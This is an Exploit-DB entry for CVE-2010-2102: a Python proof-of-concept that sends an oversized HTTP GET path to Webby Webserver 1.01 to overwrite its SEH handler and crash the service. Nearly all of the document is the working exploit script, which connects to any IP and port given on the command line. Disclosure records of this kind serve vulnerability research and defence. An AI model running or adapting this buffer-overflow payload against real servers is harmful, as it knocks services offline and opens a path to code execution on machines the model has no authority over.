Webby Webserver - POC SEH control (0day)



EDB-ID: 12740 CVE: 2010-2102 OSVDB-ID: 64963
Author: m-1-k-3 Published: 2010-05-25 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
#!/usr/bin/python

##POC details:
##
##SEH overwritten
##
##contact: 	m1k3@m1k3.at
##		http://www.s3cur1ty.de

##App detail:
##
#http://www.shareware.de/webby-webserver/
#Version		1.01
#Autor 		Timo Gaik
#Lizenzart	Freeware
#Plattformen	Win XP, Win 98, Win ME
#Letztes Update	19.10.2004
#Dateigroesse	701 KB

import socket
import sys
import os.path
import time

if len(sys.argv) < 2:
	print "Usage: webby.py <IP-Adr> <port>"
	sys.exit(0)

ips = sys.argv[1]
port = int(sys.argv[2])

string = "A"*790
string += "\x90"*4	
string += "\x42"*105		

method = "GET"
print "starting POC for:", ips
print ""

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
	connect=s.connect((ips, port))
except:
	print "no connection possible"
	sys.exit(1)

payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a'

print "\r\nsending payload"
print "\n\rusing methode %s with buffersize of: %s" % (method,str(len(string)))
print "..."

print payload
s.send(payload)
print "finished kicking method %s with payload %s" % (method,payload)
print "... the service should be crashed ... check SEH"